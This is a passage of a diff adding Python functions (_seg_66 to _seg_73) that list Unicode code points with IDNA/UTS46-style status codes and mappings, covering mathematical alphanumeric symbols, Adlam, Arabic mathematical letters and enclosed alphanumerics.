(0x1D61B, 'M', 't'), + (0x1D61C, 'M', 'u'), + (0x1D61D, 'M', 'v'), + (0x1D61E, 'M', 'w'), + (0x1D61F, 'M', 'x'), + (0x1D620, 'M', 'y'), + (0x1D621, 'M', 'z'), + (0x1D622, 'M', 'a'), + (0x1D623, 'M', 'b'), + (0x1D624, 'M', 'c'), + (0x1D625, 'M', 'd'), + (0x1D626, 'M', 'e'), + (0x1D627, 'M', 'f'), + (0x1D628, 'M', 'g'), + (0x1D629, 'M', 'h'), + (0x1D62A, 'M', 'i'), + ] + +def _seg_66() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D62B, 'M', 'j'), + (0x1D62C, 'M', 'k'), + (0x1D62D, 'M', 'l'), + (0x1D62E, 'M', 'm'), + (0x1D62F, 'M', 'n'), + (0x1D630, 'M', 'o'), + (0x1D631, 'M', 'p'), + (0x1D632, 'M', 'q'), + (0x1D633, 'M', 'r'), + (0x1D634, 'M', 's'), + (0x1D635, 'M', 't'), + (0x1D636, 'M', 'u'), + (0x1D637, 'M', 'v'), + (0x1D638, 'M', 'w'), + (0x1D639, 'M', 'x'), + (0x1D63A, 'M', 'y'), + (0x1D63B, 'M', 'z'), + (0x1D63C, 'M', 'a'), + (0x1D63D, 'M', 'b'), + (0x1D63E, 'M', 'c'), + (0x1D63F, 'M', 'd'), + (0x1D640, 'M', 'e'), + (0x1D641, 'M', 'f'), + (0x1D642, 'M', 'g'), + (0x1D643, 'M', 'h'), + (0x1D644, 'M', 'i'), + (0x1D645, 'M', 'j'), + (0x1D646, 'M', 'k'), + (0x1D647, 'M', 'l'), + (0x1D648, 'M', 'm'), + (0x1D649, 'M', 'n'), + (0x1D64A, 'M', 'o'), + (0x1D64B, 'M', 'p'), + (0x1D64C, 'M', 'q'), + (0x1D64D, 'M', 'r'), + (0x1D64E, 'M', 's'), + (0x1D64F, 'M', 't'), + (0x1D650, 'M', 'u'), + (0x1D651, 'M', 'v'), + (0x1D652, 'M', 'w'), + (0x1D653, 'M', 'x'), + (0x1D654, 'M', 'y'), + (0x1D655, 'M', 'z'), + (0x1D656, 'M', 'a'), + (0x1D657, 'M', 'b'), + (0x1D658, 'M', 'c'), + (0x1D659, 'M', 'd'), + (0x1D65A, 'M', 'e'), + (0x1D65B, 'M', 'f'), + (0x1D65C, 'M', 'g'), + (0x1D65D, 'M', 'h'), + (0x1D65E, 'M', 'i'), + (0x1D65F, 'M', 'j'), + (0x1D660, 'M', 'k'), + (0x1D661, 'M', 'l'), + (0x1D662, 'M', 'm'), + (0x1D663, 'M', 'n'), + (0x1D664, 'M', 'o'), + (0x1D665, 'M', 'p'), + (0x1D666, 'M', 'q'), + (0x1D667, 'M', 'r'), + (0x1D668, 'M', 's'), + (0x1D669, 'M', 't'), + (0x1D66A, 'M', 'u'), + (0x1D66B, 'M', 'v'), + (0x1D66C, 'M', 'w'), + (0x1D66D, 'M', 'x'), + (0x1D66E, 'M', 'y'), + (0x1D66F, 'M', 'z'), + (0x1D670, 'M', 'a'), + (0x1D671, 'M', 'b'), + (0x1D672, 'M', 'c'), + (0x1D673, 'M', 'd'), + (0x1D674, 'M', 'e'), + (0x1D675, 'M', 'f'), + (0x1D676, 'M', 'g'), + (0x1D677, 'M', 'h'), + (0x1D678, 'M', 'i'), + (0x1D679, 'M', 'j'), + (0x1D67A, 'M', 'k'), + (0x1D67B, 'M', 'l'), + (0x1D67C, 'M', 'm'), + (0x1D67D, 'M', 'n'), + (0x1D67E, 'M', 'o'), + (0x1D67F, 'M', 'p'), + (0x1D680, 'M', 'q'), + (0x1D681, 'M', 'r'), + (0x1D682, 'M', 's'), + (0x1D683, 'M', 't'), + (0x1D684, 'M', 'u'), + (0x1D685, 'M', 'v'), + (0x1D686, 'M', 'w'), + (0x1D687, 'M', 'x'), + (0x1D688, 'M', 'y'), + (0x1D689, 'M', 'z'), + (0x1D68A, 'M', 'a'), + (0x1D68B, 'M', 'b'), + (0x1D68C, 'M', 'c'), + (0x1D68D, 'M', 'd'), + (0x1D68E, 'M', 'e'), + ] + +def _seg_67() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D68F, 'M', 'f'), + (0x1D690, 'M', 'g'), + (0x1D691, 'M', 'h'), + (0x1D692, 'M', 'i'), + (0x1D693, 'M', 'j'), + (0x1D694, 'M', 'k'), + (0x1D695, 'M', 'l'), + (0x1D696, 'M', 'm'), + (0x1D697, 'M', 'n'), + (0x1D698, 'M', 'o'), + (0x1D699, 'M', 'p'), + (0x1D69A, 'M', 'q'), + (0x1D69B, 'M', 'r'), + (0x1D69C, 'M', 's'), + (0x1D69D, 'M', 't'), + (0x1D69E, 'M', 'u'), + (0x1D69F, 'M', 'v'), + (0x1D6A0, 'M', 'w'), + (0x1D6A1, 'M', 'x'), + (0x1D6A2, 'M', 'y'), + (0x1D6A3, 'M', 'z'), + (0x1D6A4, 'M', 'ı'), + (0x1D6A5, 'M', 'ȷ'), + (0x1D6A6, 'X'), + (0x1D6A8, 'M', 'α'), + (0x1D6A9, 'M', 'β'), + (0x1D6AA, 'M', 'γ'), + (0x1D6AB, 'M', 'δ'), + (0x1D6AC, 'M', 'ε'), + (0x1D6AD, 'M', 'ζ'), + (0x1D6AE, 'M', 'η'), + (0x1D6AF, 'M', 'θ'), + (0x1D6B0, 'M', 'ι'), + (0x1D6B1, 'M', 'κ'), + (0x1D6B2, 'M', 'λ'), + (0x1D6B3, 'M', 'μ'), + (0x1D6B4, 'M', 'ν'), + (0x1D6B5, 'M', 'ξ'), + (0x1D6B6, 'M', 'ο'), + (0x1D6B7, 'M', 'π'), + (0x1D6B8, 'M', 'ρ'), + (0x1D6B9, 'M', 'θ'), + (0x1D6BA, 'M', 'σ'), + (0x1D6BB, 'M', 'τ'), + (0x1D6BC, 'M', 'υ'), + (0x1D6BD, 'M', 'φ'), + (0x1D6BE, 'M', 'χ'), + (0x1D6BF, 'M', 'ψ'), + (0x1D6C0, 'M', 'ω'), + (0x1D6C1, 'M', '∇'), + (0x1D6C2, 'M', 'α'), + (0x1D6C3, 'M', 'β'), + (0x1D6C4, 'M', 'γ'), + (0x1D6C5, 'M', 'δ'), + (0x1D6C6, 'M', 'ε'), + (0x1D6C7, 'M', 'ζ'), + (0x1D6C8, 'M', 'η'), + (0x1D6C9, 'M', 'θ'), + (0x1D6CA, 'M', 'ι'), + (0x1D6CB, 'M', 'κ'), + (0x1D6CC, 'M', 'λ'), + (0x1D6CD, 'M', 'μ'), + (0x1D6CE, 'M', 'ν'), + (0x1D6CF, 'M', 'ξ'), + (0x1D6D0, 'M', 'ο'), + (0x1D6D1, 'M', 'π'), + (0x1D6D2, 'M', 'ρ'), + (0x1D6D3, 'M', 'σ'), + (0x1D6D5, 'M', 'τ'), + (0x1D6D6, 'M', 'υ'), + (0x1D6D7, 'M', 'φ'), + (0x1D6D8, 'M', 'χ'), + (0x1D6D9, 'M', 'ψ'), + (0x1D6DA, 'M', 'ω'), + (0x1D6DB, 'M', '∂'), + (0x1D6DC, 'M', 'ε'), + (0x1D6DD, 'M', 'θ'), + (0x1D6DE, 'M', 'κ'), + (0x1D6DF, 'M', 'φ'), + (0x1D6E0, 'M', 'ρ'), + (0x1D6E1, 'M', 'π'), + (0x1D6E2, 'M', 'α'), + (0x1D6E3, 'M', 'β'), + (0x1D6E4, 'M', 'γ'), + (0x1D6E5, 'M', 'δ'), + (0x1D6E6, 'M', 'ε'), + (0x1D6E7, 'M', 'ζ'), + (0x1D6E8, 'M', 'η'), + (0x1D6E9, 'M', 'θ'), + (0x1D6EA, 'M', 'ι'), + (0x1D6EB, 'M', 'κ'), + (0x1D6EC, 'M', 'λ'), + (0x1D6ED, 'M', 'μ'), + (0x1D6EE, 'M', 'ν'), + (0x1D6EF, 'M', 'ξ'), + (0x1D6F0, 'M', 'ο'), + (0x1D6F1, 'M', 'π'), + (0x1D6F2, 'M', 'ρ'), + (0x1D6F3, 'M', 'θ'), + (0x1D6F4, 'M', 'σ'), + ] + +def _seg_68() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D6F5, 'M', 'τ'), + (0x1D6F6, 'M', 'υ'), + (0x1D6F7, 'M', 'φ'), + (0x1D6F8, 'M', 'χ'), + (0x1D6F9, 'M', 'ψ'), + (0x1D6FA, 'M', 'ω'), + (0x1D6FB, 'M', '∇'), + (0x1D6FC, 'M', 'α'), + (0x1D6FD, 'M', 'β'), + (0x1D6FE, 'M', 'γ'), + (0x1D6FF, 'M', 'δ'), + (0x1D700, 'M', 'ε'), + (0x1D701, 'M', 'ζ'), + (0x1D702, 'M', 'η'), + (0x1D703, 'M', 'θ'), + (0x1D704, 'M', 'ι'), + (0x1D705, 'M', 'κ'), + (0x1D706, 'M', 'λ'), + (0x1D707, 'M', 'μ'), + (0x1D708, 'M', 'ν'), + (0x1D709, 'M', 'ξ'), + (0x1D70A, 'M', 'ο'), + (0x1D70B, 'M', 'π'), + (0x1D70C, 'M', 'ρ'), + (0x1D70D, 'M', 'σ'), + (0x1D70F, 'M', 'τ'), + (0x1D710, 'M', 'υ'), + (0x1D711, 'M', 'φ'), + (0x1D712, 'M', 'χ'), + (0x1D713, 'M', 'ψ'), + (0x1D714, 'M', 'ω'), + (0x1D715, 'M', '∂'), + (0x1D716, 'M', 'ε'), + (0x1D717, 'M', 'θ'), + (0x1D718, 'M', 'κ'), + (0x1D719, 'M', 'φ'), + (0x1D71A, 'M', 'ρ'), + (0x1D71B, 'M', 'π'), + (0x1D71C, 'M', 'α'), + (0x1D71D, 'M', 'β'), + (0x1D71E, 'M', 'γ'), + (0x1D71F, 'M', 'δ'), + (0x1D720, 'M', 'ε'), + (0x1D721, 'M', 'ζ'), + (0x1D722, 'M', 'η'), + (0x1D723, 'M', 'θ'), + (0x1D724, 'M', 'ι'), + (0x1D725, 'M', 'κ'), + (0x1D726, 'M', 'λ'), + (0x1D727, 'M', 'μ'), + (0x1D728, 'M', 'ν'), + (0x1D729, 'M', 'ξ'), + (0x1D72A, 'M', 'ο'), + (0x1D72B, 'M', 'π'), + (0x1D72C, 'M', 'ρ'), + (0x1D72D, 'M', 'θ'), + (0x1D72E, 'M', 'σ'), + (0x1D72F, 'M', 'τ'), + (0x1D730, 'M', 'υ'), + (0x1D731, 'M', 'φ'), + (0x1D732, 'M', 'χ'), + (0x1D733, 'M', 'ψ'), + (0x1D734, 'M', 'ω'), + (0x1D735, 'M', '∇'), + (0x1D736, 'M', 'α'), + (0x1D737, 'M', 'β'), + (0x1D738, 'M', 'γ'), + (0x1D739, 'M', 'δ'), + (0x1D73A, 'M', 'ε'), + (0x1D73B, 'M', 'ζ'), + (0x1D73C, 'M', 'η'), + (0x1D73D, 'M', 'θ'), + (0x1D73E, 'M', 'ι'), + (0x1D73F, 'M', 'κ'), + (0x1D740, 'M', 'λ'), + (0x1D741, 'M', 'μ'), + (0x1D742, 'M', 'ν'), + (0x1D743, 'M', 'ξ'), + (0x1D744, 'M', 'ο'), + (0x1D745, 'M', 'π'), + (0x1D746, 'M', 'ρ'), + (0x1D747, 'M', 'σ'), + (0x1D749, 'M', 'τ'), + (0x1D74A, 'M', 'υ'), + (0x1D74B, 'M', 'φ'), + (0x1D74C, 'M', 'χ'), + (0x1D74D, 'M', 'ψ'), + (0x1D74E, 'M', 'ω'), + (0x1D74F, 'M', '∂'), + (0x1D750, 'M', 'ε'), + (0x1D751, 'M', 'θ'), + (0x1D752, 'M', 'κ'), + (0x1D753, 'M', 'φ'), + (0x1D754, 'M', 'ρ'), + (0x1D755, 'M', 'π'), + (0x1D756, 'M', 'α'), + (0x1D757, 'M', 'β'), + (0x1D758, 'M', 'γ'), + (0x1D759, 'M', 'δ'), + (0x1D75A, 'M', 'ε'), + ] + +def _seg_69() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D75B, 'M', 'ζ'), + (0x1D75C, 'M', 'η'), + (0x1D75D, 'M', 'θ'), + (0x1D75E, 'M', 'ι'), + (0x1D75F, 'M', 'κ'), + (0x1D760, 'M', 'λ'), + (0x1D761, 'M', 'μ'), + (0x1D762, 'M', 'ν'), + (0x1D763, 'M', 'ξ'), + (0x1D764, 'M', 'ο'), + (0x1D765, 'M', 'π'), + (0x1D766, 'M', 'ρ'), + (0x1D767, 'M', 'θ'), + (0x1D768, 'M', 'σ'), + (0x1D769, 'M', 'τ'), + (0x1D76A, 'M', 'υ'), + (0x1D76B, 'M', 'φ'), + (0x1D76C, 'M', 'χ'), + (0x1D76D, 'M', 'ψ'), + (0x1D76E, 'M', 'ω'), + (0x1D76F, 'M', '∇'), + (0x1D770, 'M', 'α'), + (0x1D771, 'M', 'β'), + (0x1D772, 'M', 'γ'), + (0x1D773, 'M', 'δ'), + (0x1D774, 'M', 'ε'), + (0x1D775, 'M', 'ζ'), + (0x1D776, 'M', 'η'), + (0x1D777, 'M', 'θ'), + (0x1D778, 'M', 'ι'), + (0x1D779, 'M', 'κ'), + (0x1D77A, 'M', 'λ'), + (0x1D77B, 'M', 'μ'), + (0x1D77C, 'M', 'ν'), + (0x1D77D, 'M', 'ξ'), + (0x1D77E, 'M', 'ο'), + (0x1D77F, 'M', 'π'), + (0x1D780, 'M', 'ρ'), + (0x1D781, 'M', 'σ'), + (0x1D783, 'M', 'τ'), + (0x1D784, 'M', 'υ'), + (0x1D785, 'M', 'φ'), + (0x1D786, 'M', 'χ'), + (0x1D787, 'M', 'ψ'), + (0x1D788, 'M', 'ω'), + (0x1D789, 'M', '∂'), + (0x1D78A, 'M', 'ε'), + (0x1D78B, 'M', 'θ'), + (0x1D78C, 'M', 'κ'), + (0x1D78D, 'M', 'φ'), + (0x1D78E, 'M', 'ρ'), + (0x1D78F, 'M', 'π'), + (0x1D790, 'M', 'α'), + (0x1D791, 'M', 'β'), + (0x1D792, 'M', 'γ'), + (0x1D793, 'M', 'δ'), + (0x1D794, 'M', 'ε'), + (0x1D795, 'M', 'ζ'), + (0x1D796, 'M', 'η'), + (0x1D797, 'M', 'θ'), + (0x1D798, 'M', 'ι'), + (0x1D799, 'M', 'κ'), + (0x1D79A, 'M', 'λ'), + (0x1D79B, 'M', 'μ'), + (0x1D79C, 'M', 'ν'), + (0x1D79D, 'M', 'ξ'), + (0x1D79E, 'M', 'ο'), + (0x1D79F, 'M', 'π'), + (0x1D7A0, 'M', 'ρ'), + (0x1D7A1, 'M', 'θ'), + (0x1D7A2, 'M', 'σ'), + (0x1D7A3, 'M', 'τ'), + (0x1D7A4, 'M', 'υ'), + (0x1D7A5, 'M', 'φ'), + (0x1D7A6, 'M', 'χ'), + (0x1D7A7, 'M', 'ψ'), + (0x1D7A8, 'M', 'ω'), + (0x1D7A9, 'M', '∇'), + (0x1D7AA, 'M', 'α'), + (0x1D7AB, 'M', 'β'), + (0x1D7AC, 'M', 'γ'), + (0x1D7AD, 'M', 'δ'), + (0x1D7AE, 'M', 'ε'), + (0x1D7AF, 'M', 'ζ'), + (0x1D7B0, 'M', 'η'), + (0x1D7B1, 'M', 'θ'), + (0x1D7B2, 'M', 'ι'), + (0x1D7B3, 'M', 'κ'), + (0x1D7B4, 'M', 'λ'), + (0x1D7B5, 'M', 'μ'), + (0x1D7B6, 'M', 'ν'), + (0x1D7B7, 'M', 'ξ'), + (0x1D7B8, 'M', 'ο'), + (0x1D7B9, 'M', 'π'), + (0x1D7BA, 'M', 'ρ'), + (0x1D7BB, 'M', 'σ'), + (0x1D7BD, 'M', 'τ'), + (0x1D7BE, 'M', 'υ'), + (0x1D7BF, 'M', 'φ'), + (0x1D7C0, 'M', 'χ'), + ] + +def _seg_70() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D7C1, 'M', 'ψ'), + (0x1D7C2, 'M', 'ω'), + (0x1D7C3, 'M', '∂'), + (0x1D7C4, 'M', 'ε'), + (0x1D7C5, 'M', 'θ'), + (0x1D7C6, 'M', 'κ'), + (0x1D7C7, 'M', 'φ'), + (0x1D7C8, 'M', 'ρ'), + (0x1D7C9, 'M', 'π'), + (0x1D7CA, 'M', 'ϝ'), + (0x1D7CC, 'X'), + (0x1D7CE, 'M', '0'), + (0x1D7CF, 'M', '1'), + (0x1D7D0, 'M', '2'), + (0x1D7D1, 'M', '3'), + (0x1D7D2, 'M', '4'), + (0x1D7D3, 'M', '5'), + (0x1D7D4, 'M', '6'), + (0x1D7D5, 'M', '7'), + (0x1D7D6, 'M', '8'), + (0x1D7D7, 'M', '9'), + (0x1D7D8, 'M', '0'), + (0x1D7D9, 'M', '1'), + (0x1D7DA, 'M', '2'), + (0x1D7DB, 'M', '3'), + (0x1D7DC, 'M', '4'), + (0x1D7DD, 'M', '5'), + (0x1D7DE, 'M', '6'), + (0x1D7DF, 'M', '7'), + (0x1D7E0, 'M', '8'), + (0x1D7E1, 'M', '9'), + (0x1D7E2, 'M', '0'), + (0x1D7E3, 'M', '1'), + (0x1D7E4, 'M', '2'), + (0x1D7E5, 'M', '3'), + (0x1D7E6, 'M', '4'), + (0x1D7E7, 'M', '5'), + (0x1D7E8, 'M', '6'), + (0x1D7E9, 'M', '7'), + (0x1D7EA, 'M', '8'), + (0x1D7EB, 'M', '9'), + (0x1D7EC, 'M', '0'), + (0x1D7ED, 'M', '1'), + (0x1D7EE, 'M', '2'), + (0x1D7EF, 'M', '3'), + (0x1D7F0, 'M', '4'), + (0x1D7F1, 'M', '5'), + (0x1D7F2, 'M', '6'), + (0x1D7F3, 'M', '7'), + (0x1D7F4, 'M', '8'), + (0x1D7F5, 'M', '9'), + (0x1D7F6, 'M', '0'), + (0x1D7F7, 'M', '1'), + (0x1D7F8, 'M', '2'), + (0x1D7F9, 'M', '3'), + (0x1D7FA, 'M', '4'), + (0x1D7FB, 'M', '5'), + (0x1D7FC, 'M', '6'), + (0x1D7FD, 'M', '7'), + (0x1D7FE, 'M', '8'), + (0x1D7FF, 'M', '9'), + (0x1D800, 'V'), + (0x1DA8C, 'X'), + (0x1DA9B, 'V'), + (0x1DAA0, 'X'), + (0x1DAA1, 'V'), + (0x1DAB0, 'X'), + (0x1DF00, 'V'), + (0x1DF1F, 'X'), + (0x1E000, 'V'), + (0x1E007, 'X'), + (0x1E008, 'V'), + (0x1E019, 'X'), + (0x1E01B, 'V'), + (0x1E022, 'X'), + (0x1E023, 'V'), + (0x1E025, 'X'), + (0x1E026, 'V'), + (0x1E02B, 'X'), + (0x1E100, 'V'), + (0x1E12D, 'X'), + (0x1E130, 'V'), + (0x1E13E, 'X'), + (0x1E140, 'V'), + (0x1E14A, 'X'), + (0x1E14E, 'V'), + (0x1E150, 'X'), + (0x1E290, 'V'), + (0x1E2AF, 'X'), + (0x1E2C0, 'V'), + (0x1E2FA, 'X'), + (0x1E2FF, 'V'), + (0x1E300, 'X'), + (0x1E7E0, 'V'), + (0x1E7E7, 'X'), + (0x1E7E8, 'V'), + (0x1E7EC, 'X'), + (0x1E7ED, 'V'), + (0x1E7EF, 'X'), + (0x1E7F0, 'V'), + ] + +def _seg_71() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E7FF, 'X'), + (0x1E800, 'V'), + (0x1E8C5, 'X'), + (0x1E8C7, 'V'), + (0x1E8D7, 'X'), + (0x1E900, 'M', '𞤢'), + (0x1E901, 'M', '𞤣'), + (0x1E902, 'M', '𞤤'), + (0x1E903, 'M', '𞤥'), + (0x1E904, 'M', '𞤦'), + (0x1E905, 'M', '𞤧'), + (0x1E906, 'M', '𞤨'), + (0x1E907, 'M', '𞤩'), + (0x1E908, 'M', '𞤪'), + (0x1E909, 'M', '𞤫'), + (0x1E90A, 'M', '𞤬'), + (0x1E90B, 'M', '𞤭'), + (0x1E90C, 'M', '𞤮'), + (0x1E90D, 'M', '𞤯'), + (0x1E90E, 'M', '𞤰'), + (0x1E90F, 'M', '𞤱'), + (0x1E910, 'M', '𞤲'), + (0x1E911, 'M', '𞤳'), + (0x1E912, 'M', '𞤴'), + (0x1E913, 'M', '𞤵'), + (0x1E914, 'M', '𞤶'), + (0x1E915, 'M', '𞤷'), + (0x1E916, 'M', '𞤸'), + (0x1E917, 'M', '𞤹'), + (0x1E918, 'M', '𞤺'), + (0x1E919, 'M', '𞤻'), + (0x1E91A, 'M', '𞤼'), + (0x1E91B, 'M', '𞤽'), + (0x1E91C, 'M', '𞤾'), + (0x1E91D, 'M', '𞤿'), + (0x1E91E, 'M', '𞥀'), + (0x1E91F, 'M', '𞥁'), + (0x1E920, 'M', '𞥂'), + (0x1E921, 'M', '𞥃'), + (0x1E922, 'V'), + (0x1E94C, 'X'), + (0x1E950, 'V'), + (0x1E95A, 'X'), + (0x1E95E, 'V'), + (0x1E960, 'X'), + (0x1EC71, 'V'), + (0x1ECB5, 'X'), + (0x1ED01, 'V'), + (0x1ED3E, 'X'), + (0x1EE00, 'M', 'ا'), + (0x1EE01, 'M', 'ب'), + (0x1EE02, 'M', 'ج'), + (0x1EE03, 'M', 'د'), + (0x1EE04, 'X'), + (0x1EE05, 'M', 'و'), + (0x1EE06, 'M', 'ز'), + (0x1EE07, 'M', 'ح'), + (0x1EE08, 'M', 'ط'), + (0x1EE09, 'M', 'ي'), + (0x1EE0A, 'M', 'ك'), + (0x1EE0B, 'M', 'ل'), + (0x1EE0C, 'M', 'م'), + (0x1EE0D, 'M', 'ن'), + (0x1EE0E, 'M', 'س'), + (0x1EE0F, 'M', 'ع'), + (0x1EE10, 'M', 'ف'), + (0x1EE11, 'M', 'ص'), + (0x1EE12, 'M', 'ق'), + (0x1EE13, 'M', 'ر'), + (0x1EE14, 'M', 'ش'), + (0x1EE15, 'M', 'ت'), + (0x1EE16, 'M', 'ث'), + (0x1EE17, 'M', 'خ'), + (0x1EE18, 'M', 'ذ'), + (0x1EE19, 'M', 'ض'), + (0x1EE1A, 'M', 'ظ'), + (0x1EE1B, 'M', 'غ'), + (0x1EE1C, 'M', 'ٮ'), + (0x1EE1D, 'M', 'ں'), + (0x1EE1E, 'M', 'ڡ'), + (0x1EE1F, 'M', 'ٯ'), + (0x1EE20, 'X'), + (0x1EE21, 'M', 'ب'), + (0x1EE22, 'M', 'ج'), + (0x1EE23, 'X'), + (0x1EE24, 'M', 'ه'), + (0x1EE25, 'X'), + (0x1EE27, 'M', 'ح'), + (0x1EE28, 'X'), + (0x1EE29, 'M', 'ي'), + (0x1EE2A, 'M', 'ك'), + (0x1EE2B, 'M', 'ل'), + (0x1EE2C, 'M', 'م'), + (0x1EE2D, 'M', 'ن'), + (0x1EE2E, 'M', 'س'), + (0x1EE2F, 'M', 'ع'), + (0x1EE30, 'M', 'ف'), + (0x1EE31, 'M', 'ص'), + (0x1EE32, 'M', 'ق'), + (0x1EE33, 'X'), + ] + +def _seg_72() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1EE34, 'M', 'ش'), + (0x1EE35, 'M', 'ت'), + (0x1EE36, 'M', 'ث'), + (0x1EE37, 'M', 'خ'), + (0x1EE38, 'X'), + (0x1EE39, 'M', 'ض'), + (0x1EE3A, 'X'), + (0x1EE3B, 'M', 'غ'), + (0x1EE3C, 'X'), + (0x1EE42, 'M', 'ج'), + (0x1EE43, 'X'), + (0x1EE47, 'M', 'ح'), + (0x1EE48, 'X'), + (0x1EE49, 'M', 'ي'), + (0x1EE4A, 'X'), + (0x1EE4B, 'M', 'ل'), + (0x1EE4C, 'X'), + (0x1EE4D, 'M', 'ن'), + (0x1EE4E, 'M', 'س'), + (0x1EE4F, 'M', 'ع'), + (0x1EE50, 'X'), + (0x1EE51, 'M', 'ص'), + (0x1EE52, 'M', 'ق'), + (0x1EE53, 'X'), + (0x1EE54, 'M', 'ش'), + (0x1EE55, 'X'), + (0x1EE57, 'M', 'خ'), + (0x1EE58, 'X'), + (0x1EE59, 'M', 'ض'), + (0x1EE5A, 'X'), + (0x1EE5B, 'M', 'غ'), + (0x1EE5C, 'X'), + (0x1EE5D, 'M', 'ں'), + (0x1EE5E, 'X'), + (0x1EE5F, 'M', 'ٯ'), + (0x1EE60, 'X'), + (0x1EE61, 'M', 'ب'), + (0x1EE62, 'M', 'ج'), + (0x1EE63, 'X'), + (0x1EE64, 'M', 'ه'), + (0x1EE65, 'X'), + (0x1EE67, 'M', 'ح'), + (0x1EE68, 'M', 'ط'), + (0x1EE69, 'M', 'ي'), + (0x1EE6A, 'M', 'ك'), + (0x1EE6B, 'X'), + (0x1EE6C, 'M', 'م'), + (0x1EE6D, 'M', 'ن'), + (0x1EE6E, 'M', 'س'), + (0x1EE6F, 'M', 'ع'), + (0x1EE70, 'M', 'ف'), + (0x1EE71, 'M', 'ص'), + (0x1EE72, 'M', 'ق'), + (0x1EE73, 'X'), + (0x1EE74, 'M', 'ش'), + (0x1EE75, 'M', 'ت'), + (0x1EE76, 'M', 'ث'), + (0x1EE77, 'M', 'خ'), + (0x1EE78, 'X'), + (0x1EE79, 'M', 'ض'), + (0x1EE7A, 'M', 'ظ'), + (0x1EE7B, 'M', 'غ'), + (0x1EE7C, 'M', 'ٮ'), + (0x1EE7D, 'X'), + (0x1EE7E, 'M', 'ڡ'), + (0x1EE7F, 'X'), + (0x1EE80, 'M', 'ا'), + (0x1EE81, 'M', 'ب'), + (0x1EE82, 'M', 'ج'), + (0x1EE83, 'M', 'د'), + (0x1EE84, 'M', 'ه'), + (0x1EE85, 'M', 'و'), + (0x1EE86, 'M', 'ز'), + (0x1EE87, 'M', 'ح'), + (0x1EE88, 'M', 'ط'), + (0x1EE89, 'M', 'ي'), + (0x1EE8A, 'X'), + (0x1EE8B, 'M', 'ل'), + (0x1EE8C, 'M', 'م'), + (0x1EE8D, 'M', 'ن'), + (0x1EE8E, 'M', 'س'), + (0x1EE8F, 'M', 'ع'), + (0x1EE90, 'M', 'ف'), + (0x1EE91, 'M', 'ص'), + (0x1EE92, 'M', 'ق'), + (0x1EE93, 'M', 'ر'), + (0x1EE94, 'M', 'ش'), + (0x1EE95, 'M', 'ت'), + (0x1EE96, 'M', 'ث'), + (0x1EE97, 'M', 'خ'), + (0x1EE98, 'M', 'ذ'), + (0x1EE99, 'M', 'ض'), + (0x1EE9A, 'M', 'ظ'), + (0x1EE9B, 'M', 'غ'), + (0x1EE9C, 'X'), + (0x1EEA1, 'M', 'ب'), + (0x1EEA2, 'M', 'ج'), + (0x1EEA3, 'M', 'د'), + (0x1EEA4, 'X'), + (0x1EEA5, 'M', 'و'), + ] + +def _seg_73() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1EEA6, 'M', 'ز'), + (0x1EEA7, 'M', 'ح'), + (0x1EEA8, 'M', 'ط'), + (0x1EEA9, 'M', 'ي'), + (0x1EEAA, 'X'), + (0x1EEAB, 'M', 'ل'), + (0x1EEAC, 'M', 'م'), + (0x1EEAD, 'M', 'ن'), + (0x1EEAE, 'M', 'س'), + (0x1EEAF, 'M', 'ع'), + (0x1EEB0, 'M', 'ف'), + (0x1EEB1, 'M', 'ص'), + (0x1EEB2, 'M', 'ق'), + (0x1EEB3, 'M', 'ر'), + (0x1EEB4, 'M', 'ش'), + (0x1EEB5, 'M', 'ت'), + (0x1EEB6, 'M', 'ث'), + (0x1EEB7, 'M', 'خ'), + (0x1EEB8, 'M', 'ذ'), + (0x1EEB9, 'M', 'ض'), + (0x1EEBA, 'M', 'ظ'), + (0x1EEBB, 'M', 'غ'), + (0x1EEBC, 'X'), + (0x1EEF0, 'V'), + (0x1EEF2, 'X'), + (0x1F000, 'V'), + (0x1F02C, 'X'), + (0x1F030, 'V'), + (0x1F094, 'X'), + (0x1F0A0, 'V'), + (0x1F0AF, 'X'), + (0x1F0B1, 'V'), + (0x1F0C0, 'X'), + (0x1F0C1, 'V'), + (0x1F0D0, 'X'), + (0x1F0D1, 'V'), + (0x1F0F6, 'X'), + (0x1F101, '3', '0,'), + (0x1F102, '3', '1,'), + (0x1F103, '3', '2,'), + (0x1F104, '3', '3,'), + (0x1F105, '3', '4,'), + (0x1F106, '3', '5,'), + (0x1F107, '3', '6,'), + (0x1F108, '3', '7,'), + (0x1F109, '3', '8,'), + (0x1F10A, '3', '9,'), + (0x1F10B, 'V'), + (0x1F110, '3', '(a)'), + (0x1F111, '3', '(b)'), + (0x1F112, '3', '(c)'), + (0x1F113, '3', '(d)'), + (0x1F114, '3', '(e)'), + (0x1F115, '3', '(f)'), + (0x1F116, '3', '(g)'), + (0x1F117, '3', '(h)'), + (0x1F118, '3', '(i)'), + (0x1F119, '3', '(j)'), + (0x1F11A, '3', '(k)'), + (0x1F11B, '3', '(l)'), + (0x1F11C, '3', '(m)'), + (0x1F11D, '3', '(n)'), + (0x1F11E, '3', '(o)'), + (0x1F11F, '3', '(p)'), + (0x1F120, '3', '(q)'), + (0x1F121, '3', '(r)'), + (0x1F122, '3', '(s)'), + (0x1F123, '3', '(t)'), + (0x1F124, '3', '(u)'), + (0x1F125, '3', '(v)'), + (0x1F126, '3', '(w)'), + (0x1F127, '3', '(x)'), + (0x1F128, '3', '(y)'), + (0x1F129, '3', '(z)'), + (0x1F12A, 'M', '〔s〕'), + (0x1F12B, 'M', 'c'), + (0x1F12C, 'M', 'r'), + (0x1F12D, 'M', 'cd'), + (0x1F12E, 'M', 'wz'), + (0x1F12F, 'V'), + (0x1F130, 'M', 'a'), + (0x1F131, 'M', 'b'), + (0x1F132, 'M', 'c'), + (0x1F133, 'M', 'd'), + (0x1F134, 'M', 'e'), + (0x1F135, 'M', 'f'), + (0x1F136, 'M', 'g'), + (0x1F137, 'M', 'h'), + (0x1F138, 'M', 'i'), + (0x1F139, 'M', 'j'), + (0x1F13A, 'M', 'k'), + (0x1F13B, 'M', 'l'), + (0x1F13C, 'M', 'm'), + (0x1F13D, 'M', 'n'), + 